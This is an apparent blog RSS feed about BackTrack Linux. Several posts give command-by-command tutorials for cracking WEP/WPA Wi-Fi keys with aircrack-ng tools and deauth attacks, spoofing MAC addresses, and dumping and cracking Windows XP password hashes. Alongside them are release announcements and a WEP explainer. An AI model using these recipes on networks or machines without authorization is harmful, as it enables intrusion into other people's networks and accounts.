airmon-ng stop ath0 ==&amp;gt; destroy adapter virtual&lt;br /&gt;
airmon-ng stop ath1 ==&amp;gt; destroy adapter virtual&lt;br /&gt;
airmon-ng start wifi0 ==&amp;gt; create new adapter virtual&lt;br /&gt;
Console 1:&lt;br /&gt;
airodump-ng ath0 ==&amp;gt; scanning&lt;br /&gt;
airodump-ng –channel CHANNEL_NUMBER –bssid MAC_AP -w FILE_NAME_SAVE ath0 ==&amp;gt; Capture information&lt;br /&gt;
Console 2:&lt;br /&gt;
aireplay-ng –arpreplay -b MAC_AP -h MAC_CLIENT ath0 ==&amp;gt; help capture information with arp attack&lt;br /&gt;
Console 3:&lt;br /&gt;
aireplay-ng –deauth 2 -c MAC_CLIENT -a MAC_AP ath0 ==&amp;gt; help capture information with deauth&lt;br /&gt;
While capture information, get the packet as far as u can because that very important to crack WEP.&lt;br /&gt;
Final:&lt;br /&gt;
aircrack-ng FILE_NAME_SAVE*.cap ==&amp;gt; Cracking&lt;br /&gt;
Wait and see the passphrase.&lt;br /&gt;
done. &lt;img alt=";)" class="wp-smiley" src="http://s.wordpress.com/wp-includes/images/smilies/icon_wink.gif" /&gt; &lt;br /&gt;
&lt;b&gt;Good Luck…&lt;/b&gt; &lt;img alt=":)" class="wp-smiley" src="http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif" /&gt; &lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Wi-Fi Hacking – Crack WPA</title><link>http://kluwanbacktrack.blogspot.com/2010/02/wi-fi-hacking-crack-wpa.html</link><category>all for free tool your downloads</category><category>backtrack</category><category>BT4 final</category><category>daftar isi</category><category>tutorial</category><category>WEP</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Sun, 7 Feb 2010 19:36:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-7465993955559854559</guid><description>&lt;div class="entry"&gt;&lt;div class="snap_preview"&gt;Still using BackTrack OS. Step by step :&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;ol&gt;&lt;li&gt;airmon-ng stop ath0&lt;/li&gt;
&lt;li&gt;airmon-ng start wifi0&lt;/li&gt;
&lt;li&gt;airodump-ng ath0&lt;/li&gt;
&lt;li&gt;airodump-ng -c CHANNEL_NUMBER -w FILE_NAME –bssid MAC_AP ath0 [Wait until shakehand packet captured]&lt;/li&gt;
&lt;li&gt;aireplay-ng -0 1 -a MAC_AP -c MAC_CLIENT ath0&lt;/li&gt;
&lt;li&gt;aircrack-ng -w FILE_WORD_LIST -b MAC_AP FILE_NAME*.cap&lt;/li&gt;
&lt;li&gt;Wait and see the passphrase&lt;/li&gt;
&lt;li&gt;done. &lt;img alt=";)" class="wp-smiley" src="http://s.wordpress.com/wp-includes/images/smilies/icon_wink.gif" /&gt; &lt;/li&gt;
&lt;/ol&gt;&lt;b&gt;Good Luck…&lt;/b&gt; &lt;img alt=":)" class="wp-smiley" src="http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif" /&gt; &lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Cracking WPA-PSK and WPA-2 with BackTrack 4 Beta</title><link>http://kluwanbacktrack.blogspot.com/2010/02/how-to-cracking-wpa-psk-and-wpa-2-with.html</link><category>all for free tool your downloads</category><category>bt4 beta</category><category>daftar isi</category><category>hacking</category><category>Hacking Tools</category><category>WEP</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Sun, 7 Feb 2010 18:40:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-4997087906175607608</guid><description>The mechanics of cracking WPA is simple and straightforward, the biggest drawback is that you must have the password in your dictionary file after you capture the handshake and there must be a computer connected to the AP you want to compromise. I am using and HP Pavilion Laptop with a Raylink wireless USB antenna, I booted Bactrack 4 from CD and I am eady to begin.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
First I have to stop the wireless card so I can manipulate some settings.&lt;br /&gt;
&lt;br /&gt;
airmon-ng stop wlan0&lt;br /&gt;
&lt;br /&gt;
(wlan0 is my wireless USB atenna), if I am usnsure what devices I have I would run&lt;br /&gt;
&lt;br /&gt;
ifconfig -a&lt;br /&gt;
&lt;br /&gt;
to show me all available NIC's&lt;br /&gt;
&lt;br /&gt;
Now down the wireless card by typing&lt;br /&gt;
&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
&lt;br /&gt;
I am now ready to assign a fake mac address to my USB device&lt;br /&gt;
&lt;br /&gt;
macchanger - - mac 00:11:22:33:44:55&lt;br /&gt;
&lt;br /&gt;
I can use any mac address as long as its valid in length and characters this one is simply easy to use.&lt;br /&gt;
&lt;br /&gt;
Next you must identify the bssid and channel of the AP you want to crack&lt;br /&gt;
&lt;br /&gt;
airodump-ng wlan0&lt;br /&gt;
&lt;br /&gt;
This will show you all AP within the range of your wireless card. The screen will look something like&lt;br /&gt;
&lt;br /&gt;
BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
00:1C:58:AE:C3:01 -60 124 1 0 1 54 WPA2 CCMP PSK Network&lt;br /&gt;
&lt;br /&gt;
BSSID Station PWR Rate Lost Packets Probe&lt;br /&gt;
00:1C:58:AE:C3:01 00:1B:66:AD:C6:00 -57 0- 1 48 Network&lt;br /&gt;
&lt;br /&gt;
You will need the bssid and channel to proceed to the next step&lt;br /&gt;
&lt;br /&gt;
airodump-ng -c 1 -w wpa1 - - bssid 00:1C:58:AE:C3:01 wlan0&lt;br /&gt;
&lt;br /&gt;
This command starts monitoring traffic on the specific AP and writes the information collected to a file, in this example the file is called wpa1. This file is used in aircrack to decrypt the actual password&lt;br /&gt;
&lt;br /&gt;
Now open a new shell and we are ready to caputre the handshake between a workstation and the AP.&lt;br /&gt;
&lt;br /&gt;
aireplay-ng -0 10 -bssid 00:1C:58:AE:C3:01 -c 00:1C:58:AE:C3:01 wlan0&lt;br /&gt;
&lt;br /&gt;
This command sends a reinjection of deauth packet to the AP and will force a new handshake between the workstation and the AP. When you capture it your airodump screen with show a message across the top saying it has the Handshake.&lt;br /&gt;
&lt;br /&gt;
Now you are ready to crack the password, you can now stop both the airodump and aireplay shells and open a final new shell. By default BackTrack 4 has a dictionary file you can use though I suggest modifing it with additional passwords for a more feature rich attack. It is located under /pentest/wireless/cowpatty and is named dict. You can navigate to it using Konqueror or via command line Now in your new console type in&lt;br /&gt;
&lt;br /&gt;
aircrack-ng wpa1 -w /pentest/wireless/cowpatty/dict&lt;br /&gt;
&lt;br /&gt;
Now if you have the pasword in your dict file it will only take a few moments for the crack and the password to be show on screen.&lt;br /&gt;
&lt;br /&gt;
Many AP now change passwords every hour others have WPA keys with very high encryption values and make it extremely difficult to crack. Bottom line if your a company and you have WPA using very high encryption values this make it almost impossible to crack unless a professional has hours and hours of time and a dict file hundreds of megabytes in size.</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>BackTrack 4 Pre Final – Public Release and Download</title><link>http://kluwanbacktrack.blogspot.com/2010/02/backtrack-4-pre-final-public-release.html</link><category>all for free tool your downloads</category><category>BT4 final</category><category>daftar isi</category><category>download free</category><category>hacking</category><category>Hacking Tools</category><category>movie free download</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Sun, 7 Feb 2010 18:29:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-6757532046644285588</guid><description>The Remote Exploit Team is ecstatic to announce the public release of BackTrack 4 Pre Final codename “pwnsauce“. A VMWare Image of BT4 will be released in a few days. We have major changes in BackTrack, and have tried to document and summarize them as best as possible.&lt;br /&gt;
Check out our BackTrack &lt;a href="http://www.offensive-security.com/backtrack-tutorials.php"&gt;Videos and Resources&lt;/a&gt;, our &lt;a href="http://www.offensive-security.com/backtrack4-guide-tutorial.pdf"&gt;BackTrack PDF&lt;/a&gt;, and our “Introduction to BackTrack 4” movie.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
We’ve opened up new subforums for this release. Please report bugs and suggestions&lt;br /&gt;
As usual, we ask that you do not link directly to our mirrored ISOs. We are trying to get a rough download count for BT4pf.&lt;br /&gt;
If you would like to link to our iso, please use :&lt;br /&gt;
&lt;a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso"&gt;http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso&lt;/a&gt;&lt;br /&gt;
md5sum and sha256sum can be found here, here and here. The Remote Exploit Website News page will be soon updated.&lt;br /&gt;
Enjoy&lt;br /&gt;
Remote Exploit Team&lt;br /&gt;
via &lt;a href="http://www.offensive-security.com/blog/backtrack/backtrack-pre-final-public-release-and-download/"&gt;Offensive Security – Information Security Blog » BackTrack Pre Final – Public Release and Download&lt;/a&gt;.</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure length="115386" type="application/pdf" url="http://www.offensive-security.com/backtrack4-guide-tutorial.pdf"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>The Remote Exploit Team is ecstatic to announce the public release of BackTrack 4 Pre Final codename “pwnsauce“. A VMWare Image of BT4 will be released in a few days. We have major changes in BackTrack, and have tried to document and summarize them as best as possible. Check out our BackTrack Videos and Resources, our BackTrack PDF, and our “Introduction to BackTrack 4” movie. We’ve opened up new subforums for this release. Please report bugs and suggestions As usual, we ask that you do not link directly to our mirrored ISOs. We are trying to get a rough download count for BT4pf. If you would like to link to our iso, please use : http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso md5sum and sha256sum can be found here, here and here. The Remote Exploit Website News page will be soon updated. Enjoy Remote Exploit Team via Offensive Security – Information Security Blog » BackTrack Pre Final – Public Release and Download.</itunes:subtitle><itunes:author>noreply@blogger.com (Mr. X)</itunes:author><itunes:summary>The Remote Exploit Team is ecstatic to announce the public release of BackTrack 4 Pre Final codename “pwnsauce“. A VMWare Image of BT4 will be released in a few days. We have major changes in BackTrack, and have tried to document and summarize them as best as possible. Check out our BackTrack Videos and Resources, our BackTrack PDF, and our “Introduction to BackTrack 4” movie. We’ve opened up new subforums for this release. Please report bugs and suggestions As usual, we ask that you do not link directly to our mirrored ISOs. We are trying to get a rough download count for BT4pf. If you would like to link to our iso, please use : http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso md5sum and sha256sum can be found here, here and here. The Remote Exploit Website News page will be soon updated. Enjoy Remote Exploit Team via Offensive Security – Information Security Blog » BackTrack Pre Final – Public Release and Download.</itunes:summary><itunes:keywords>all for free tool your downloads, BT4 final, daftar isi, download free, hacking, Hacking Tools, movie free download</itunes:keywords></item><item><title/><link>http://kluwanbacktrack.blogspot.com/2010/02/backtrack-4-final-version-is-now.html</link><category>all for free tool your downloads</category><category>BT4 final</category><category>daftar isi</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Sun, 7 Feb 2010 18:28:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-4577682117520994612</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_-of_mDCZBU4/S292v0BBHkI/AAAAAAAAA0Q/xe06eFE-oGM/s1600-h/backtrack4_4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://2.bp.blogspot.com/_-of_mDCZBU4/S292v0BBHkI/AAAAAAAAA0Q/xe06eFE-oGM/s200/backtrack4_4.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;BackTrack 4 final version is now released for security professionals. The development team has mentioned that lots of downloads have already taken place from the official site. BackTrack 4 is providing penetration testing, cyber security and most importantly cyber forensics functionalities for the concerned people. It is a fantastic tool as suggested by Perry4Law and PTLB.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
BackTrack is one of the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.&lt;br /&gt;
&lt;br /&gt;
BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.&lt;br /&gt;
&lt;br /&gt;
If you need any help feel free to contact its “Forum” or check its “how to” segment or its “FAQ” segment. If you need good training in these crucial areas, feel free to consult its “Training” segment. If you need any “Techno-Legal” assistance in India you must contact Perry4Law for the same. Perry4Law is India’s first and exclusive techno-legal law firm of India and one of the few in the world.&lt;br /&gt;
&lt;br /&gt;
Perry4Law is also managing Perry4Law Techno-Legal Base (PTLBTM/SM). PTLB is India’s first dedicated techno-legal platform that is providing consultancy, litigation and training services in the fields of cyber law,cyber security , cyber forensics, etc. Presently, India lacks cyber forensics capabilities and PTLB is meeting this much needed requirement. PTLB is operating as a “Resource Centre for Cyber Forensics in India”.&lt;br /&gt;
&lt;br /&gt;
If any person is interested in getting consultancy, litigation or training services in the field of cyber forensics in India, you may check the “Contact Point” of Perry4Law.</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://2.bp.blogspot.com/_-of_mDCZBU4/S292v0BBHkI/AAAAAAAAA0Q/xe06eFE-oGM/s72-c/backtrack4_4.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Tutorial Install Backtrack 4 final dual boot Windows Vista</title><link>http://kluwanbacktrack.blogspot.com/2010/01/tutorial-install-backtrack-4-final-dual.html</link><category>backtrack</category><category>BT4 final</category><category>cracking</category><category>final free</category><category>free dowload</category><category>free programming</category><category>Hacking Tools</category><category>video</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Wed, 20 Jan 2010 12:51:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-8969679320939034563</guid><description>Backtrack 4 Final bisa di install pada windows Vista, caranya? lihat aja penjelasannya disini :&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;object width="100%" height="505"&gt;&lt;param name="movie" value="http://www.youtube.com/v/qRDofXtlzdw&amp;hl=en_US&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/qRDofXtlzdw&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="100%" height="505"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
susah,sulit,mumet....pusing deh mikirin BT4 final...</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total></item><item><title>Tutorial Install Backtrack 4 pree final gratis</title><link>http://kluwanbacktrack.blogspot.com/2010/01/tutorial-install-backtrack-4-pree-final.html</link><category>backtrack</category><category>BT4 final</category><category>daftar isi</category><category>final free</category><category>free dowload</category><category>hacking</category><category>Hacking Tools</category><category>video</category><category>WEP</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Wed, 20 Jan 2010 12:11:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-4745212431965894406</guid><description>Penasaran dengan BT 4 Pree Final dan ingin menginstall pada Hardisk?&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Lihat disini dengan jelas ( buat dulu dua partisi, partisi ext dan partisi swap ).&lt;br /&gt;
Tapi pada dvd Bt4 final sudah tersedia cara partisinya juga.&lt;br /&gt;
&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/B2GGfzh-bPo&amp;hl=en_US&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/B2GGfzh-bPo&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Semoga bermanfaat...</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Tools Backtrack 4 Pre Final Release</title><link>http://kluwanbacktrack.blogspot.com/2010/01/tools-backtrack-4-pre-final-release.html</link><category>backtrack</category><category>cara instal backtrack</category><category>computer pc</category><category>cracking</category><category>daftar isi</category><category>free dowload</category><category>hacking</category><category>Hacking Tools</category><category>movie free download</category><category>WEP</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Wed, 20 Jan 2010 06:41:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-761187380063808279</guid><description>The team at offensive-security have been working their butts off on BT4 and the latest version is a testament to that.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt; I’m making room for it on my Aspire One right now. In the mean time, I loaded it up on Vbox and dug around a little to show you some of the new features. Enjoy!&lt;br /&gt;
&lt;h3&gt;Backtrack 4 APT repo&lt;/h3&gt;&lt;code&gt;http://archive.offensive-security.com/&lt;/code&gt;&lt;br /&gt;
&lt;h3&gt;Backtrack 4 Pre Final Screens&lt;/h3&gt;&lt;h3&gt;Backtrack 4 Pre Final Firefox Info&lt;/h3&gt;&lt;span class="UserAgentHeader"&gt;User Agent:&lt;/span&gt; Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.11&lt;br /&gt;
&lt;span class="ExtensionHeader"&gt;Enabled Extensions:&lt;/span&gt; [2] &lt;br /&gt;
&lt;ul&gt;&lt;li&gt;NoScript 1.9.3.3&lt;/li&gt;
&lt;li&gt;Ubuntu Firefox Modifications 0.6&lt;/li&gt;
&lt;/ul&gt;&lt;span class="ExtensionDisabledHeader"&gt;Disabled Extensions:&lt;/span&gt; [5] &lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Firebug 1.3.3&lt;/li&gt;
&lt;li&gt;FoxyProxy 2.9&lt;/li&gt;
&lt;li&gt;Greasemonkey 0.8.20090123.1&lt;/li&gt;
&lt;li&gt;HackBar 1.3.2&lt;/li&gt;
&lt;li&gt;Tamper Data 10.1.0&lt;/li&gt;
&lt;/ul&gt;&lt;h3&gt;Backtrack 4 Pre Final Tutorial/Guide PDF&lt;/h3&gt;&lt;code&gt;http://www.offensive-security.com/backtrack4-guide-tutorial.pdf&lt;/code&gt;&lt;br /&gt;
&lt;h3&gt;Introduction to BackTrack 4 movie&lt;/h3&gt;&lt;code&gt;http://www.offensive-security.com/videos/backtrack-security-training-video/up-and-running-backtrack.html&lt;/code&gt;&lt;br /&gt;
&lt;h3&gt;Backtrack 4 Pre Final Subforum&lt;/h3&gt;&lt;code&gt;http://forums.remote-exploit.org/backtrack-4-pre-final/&lt;/code&gt;&lt;br /&gt;
&lt;h3&gt;Download Backtrack 4 Pre Final Release ISO (1329MB)&lt;/h3&gt;&lt;code&gt;http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso&lt;/code&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Hacking WEP Password</title><link>http://kluwanbacktrack.blogspot.com/2010/01/hacking-wep-password.html</link><category>backtrack</category><category>blackhat</category><category>cara instal backtrack</category><category>cracking</category><category>daftar isi</category><category>hacking</category><category>Hacking Tools</category><category>WEP</category><category>wireless</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Wed, 20 Jan 2010 01:25:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-708344473553801075</guid><description>Sebelum kita memulainya kita harus berdo'a :&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="post-body entry-content"&gt; Peralatan yang kita butuhkan yaitu :&lt;br /&gt;
1. Backtrack 3,2, atau 4Pre Final (boleh menggunakan Distro Linux Yang lainnya)&lt;br /&gt;
2. Komputer PC minimal pentium III 1Ghz&lt;br /&gt;
3. Memory 512 (Recomended)&lt;br /&gt;
4. VGA (Terserah) yang penting di atas 64Mb.&lt;br /&gt;
5. Nah yang satu ini lebih penting yaitu " Wireless Card USB/PCI" dan yang lebih penting lagi Chipset nya "Atheros dan Prism". Kenapa Atheros dan Prism?? Karena Chipset tersebut Support untuk teknik inject jaringan.&lt;br /&gt;
&lt;br /&gt;
Sekarang kita mulai untuk berperang. Karena jika saya menerangkan dengan tulisan pasti akan panjang sekali. Maka dari itu saya langsung memberikan Video nya saja. Mohon di maklumi. He he he he&lt;br /&gt;
Ini adalah Video Hacking WEP dengan Backtrack 3 Final :&lt;br /&gt;
http://www.youtube.com/watch?v=WqQDqvqCYqU&amp;amp;feature=player_embedded&lt;/div&gt;&lt;span class="post-author vcard"&gt; &lt;/span&gt;&lt;span class="post-icons"&gt;&lt;span class="item-action"&gt;&lt;a href="http://www.blogger.com/email-post.g?blogID=7656506716640318780&amp;amp;postID=4621232191139846670" title="Posting Email"&gt; &lt;/a&gt; &lt;/span&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Cracking Password Windows XP Menggunakan Linux Backtrack 3 beta</title><link>http://kluwanbacktrack.blogspot.com/2010/01/cracking-password-windows-xp.html</link><category>cracking</category><category>daftar isi</category><category>hacking</category><category>Hacking Tools</category><category>WEP</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Wed, 20 Jan 2010 01:15:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-8079336985533022594</guid><description>&lt;ol&gt;&lt;li&gt;Langkah pertama yg harus anda lakukan adalah memiliki Distro Linux Backtrack (BT), &lt;a name='more'&gt;&lt;/a&gt;dalam tutorial ini saya menggunakan &lt;a href="http://remote-exploit.org/backtrack_download.html" style="background-color: white; color: #3333ff;" target="_blank"&gt;BackTrack 3 beta&lt;/a&gt;&amp;nbsp;&lt;span style="color: #3333ff;"&gt;&lt;span style="color: black;"&gt;yang dijalankan&lt;/span&gt; &lt;/span&gt;&lt;a href="http://www.pendrivelinux.com/2008/02/29/usb-backtrack-linux-installation/" style="color: #3333ff;" target="_blank"&gt;lewat USB Flashdisk&lt;/a&gt;, tapi anda juga dapat menggunakan BT2, hanya saja letak tool yg digunakan ada sedikit perbedaan.  &lt;/li&gt;
&lt;li&gt;Setting 1st Booting lewat USB Flashdisk/CDRom (jika menggunakan Live CD).  &lt;/li&gt;
&lt;li&gt;Jika meminta User Login masukkan user="&lt;span style="font-family: courier new,courier; font-size: x-small;"&gt;&lt;strong&gt;root&lt;/strong&gt;&lt;/span&gt;" pass="&lt;span style="font-family: courier new,courier; font-size: x-small;"&gt;&lt;strong&gt;toor&lt;/strong&gt;&lt;/span&gt;" kemudian ketik "&lt;span style="font-family: courier new,courier; font-size: x-small;"&gt;&lt;strong&gt;startx&lt;/strong&gt;&lt;/span&gt;".  &lt;/li&gt;
&lt;li&gt;Buka konsole &lt;span style="font-family: courier new,courier; font-size: x-small;"&gt;(&lt;strong&gt;alt+f2&lt;/strong&gt;)&lt;/span&gt; ketik "&lt;span style="font-family: courier new,courier; font-size: x-small;"&gt;&lt;strong&gt;konsole&lt;/strong&gt;&lt;/span&gt;", atau bisa langsung klik icon konsole.  &lt;/li&gt;
&lt;li&gt;Pada dasarnya File penyimpanan password terletak pada &lt;span style="font-family: lucida sans unicode,lucida; font-size: small;"&gt;&lt;span style="font-family: courier new,courier; font-size: x-small;"&gt;&lt;strong&gt;C:\WINDOWS\system32\config\SAM&lt;/strong&gt;&lt;/span&gt;.&lt;/span&gt; File inilah yg akan kita gunakan untuk mendapatkan password Win XP.  &lt;/li&gt;
&lt;li&gt;Setelah konsole terbuka, ketik: "&lt;span style="font-family: courier new,courier; font-size: x-small;"&gt;&lt;strong&gt;bkhive /mnt/sda1/WINDOWS/system32/config/system sam&lt;/strong&gt;&lt;/span&gt;". Pastikan semua hardisk sudah ter-mount khusunya hardisk system Win XP. Biasanya untuk hardisk SATA, Drive C:\ Windows terletak pd &lt;span style="font-family: courier new,courier;"&gt;/mnt/sda1 &lt;/span&gt;dan&amp;nbsp; hardisk ATA/IDE terletak pada hda1, anda tinggal mengganti "&lt;span style="font-family: courier new,courier;"&gt;&lt;strong&gt;/mnt/sda1&lt;/strong&gt;&lt;/span&gt;" dengan "&lt;span style="font-family: courier new,courier;"&gt;&lt;strong&gt;/mnt/hda1&lt;/strong&gt;&lt;/span&gt;" atau yg lain sesuai dengan keadaan.  &lt;/li&gt;
&lt;li&gt;Ketik "&lt;strong&gt;&lt;span style="font-family: courier new,courier;"&gt;samdump2 /mnt/sda1/WINDOWS/system32/config/SAM sam&lt;/span&gt;&lt;/strong&gt;"  &lt;/li&gt;
&lt;li&gt;Ketik "&lt;span style="font-family: courier new,courier; font-size: x-small;"&gt;&lt;strong&gt;samdump2 /mnt/sda1/WINDOWS/system32/config/SAM sam &amp;gt; hash.txt&lt;/strong&gt;&lt;/span&gt;"  &lt;/li&gt;
&lt;li&gt;Untuk melihat file hasil hash, ketik "&lt;strong&gt;&lt;span style="font-family: courier new,courier;"&gt;cat hash.txt&lt;/span&gt;&lt;/strong&gt;"  &lt;/li&gt;
&lt;li&gt;Masuk ke direktori johntheripper, dengan mengetik "&lt;strong&gt;&lt;span style="font-family: courier new,courier;"&gt;cd /usr/local/john-1.7.2&lt;/span&gt;&lt;/strong&gt;"  &lt;/li&gt;
&lt;li&gt;Lakukan cracking password bruteforce dengan perintah "&lt;strong&gt;&lt;span style="font-family: courier new,courier;"&gt;john /root/hash.txt&lt;/span&gt;&lt;/strong&gt;"  &lt;/li&gt;
&lt;li&gt;Untuk mendapatkan password user tertentu menggunakan perintah "&lt;strong&gt;&lt;span style="font-family: courier new,courier;"&gt;john /root/hash.txt --users=namauser&lt;/span&gt;&lt;/strong&gt;" contoh: "&lt;strong&gt;&lt;span style="font-family: courier new,courier;"&gt;john /root/hash.txt --users=Administrator&lt;/span&gt;&lt;/strong&gt;"  &lt;/li&gt;
&lt;li&gt;Tekan &lt;span style="font-family: courier new,courier;"&gt;&lt;strong&gt;Enter &lt;/strong&gt;&lt;/span&gt;untuk melihat aktivitas &lt;strong&gt;&lt;span style="font-family: courier new,courier;"&gt;john&lt;/span&gt;&lt;/strong&gt;.  &lt;/li&gt;
&lt;li&gt;Jika semuanya berjalan lancar maka password akan segera anda dapatkan.&lt;/li&gt;
&lt;/ol&gt;Jika ada kesalahan mohon dikoreksi, maklum newbie.. &lt;img src="http://images.multiply.com/common/smiles/smile.png" /&gt;&amp;nbsp;Selamat Mencoba...!!!</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Sekilas Tentang WEP dan WPA</title><link>http://kluwanbacktrack.blogspot.com/2010/01/sekilas-tentang-wep-dan-wpa.html</link><category>artikel</category><category>daftar isi</category><category>tips dan trick</category><category>tutorial</category><category>WEP</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Wed, 20 Jan 2010 00:40:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-8771074285653792133</guid><description>&lt;strong&gt;Keamanan Wireless dengan metode Wired Equivalent Privacy (WEP)&lt;/strong&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;div align="justify"&gt;WEP merupakan standart keamanan &amp;amp; enkripsi pertama yang digunakan pada wireless, WEP (Wired Equivalent Privacy) adalah suatu metoda pengamanan jaringan nirkabel, disebut juga dengan Shared Key Authentication. Shared Key Authentication adalah metoda otentikasi yang membutuhkan penggunaan WEP. Enkripsi WEP menggunakan kunci yang dimasukkan (oleh administrator) ke client maupun access point. Kunci ini harus cocok dari yang diberikan akses point ke client, dengan yang dimasukkan client untuk authentikasi menuju access point, dan WEP mempunyai standar 802.11b.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Proses Shared Key Authentication:&lt;br /&gt;
&lt;div align="justify"&gt;&lt;ol type="1"&gt;&lt;li&gt;Client meminta asosiasi ke access point, langkah ini sama seperti Open System Authentication. &lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;Access point mengirimkan text challenge ke client secara transparan. &lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;Client akan memberikan respon dengan mengenkripsi text challenge dengan menggunakan kunci WEP dan mengirimkan kembali ke access point. &lt;br /&gt;
&lt;/li&gt;
&lt;li&gt;Access point memberi respon atas tanggapan client, akses point akan melakukan decrypt terhadap respon enkripsi dari client untuk melakukan verifikasi bahwa text challenge dienkripsi dengan menggunakan WEP key yang sesuai. Pada proses ini, access point akan menentukan apakah client sudah memberikan kunci WEP yang sesuai. Apabila kunci WEP yang diberikan oleh client sudah benar, maka access point akan merespon positif dan langsung meng-authentikasi client. Namun bila kunci WEP yang dimasukkan client adalah salah, maka access point akan merespon negatif dan client tidak akan diberi authentikasi. Dengan demikian, client tidak akan terauthentikasi dan tidak terasosiasi. &lt;/li&gt;
&lt;/ol&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
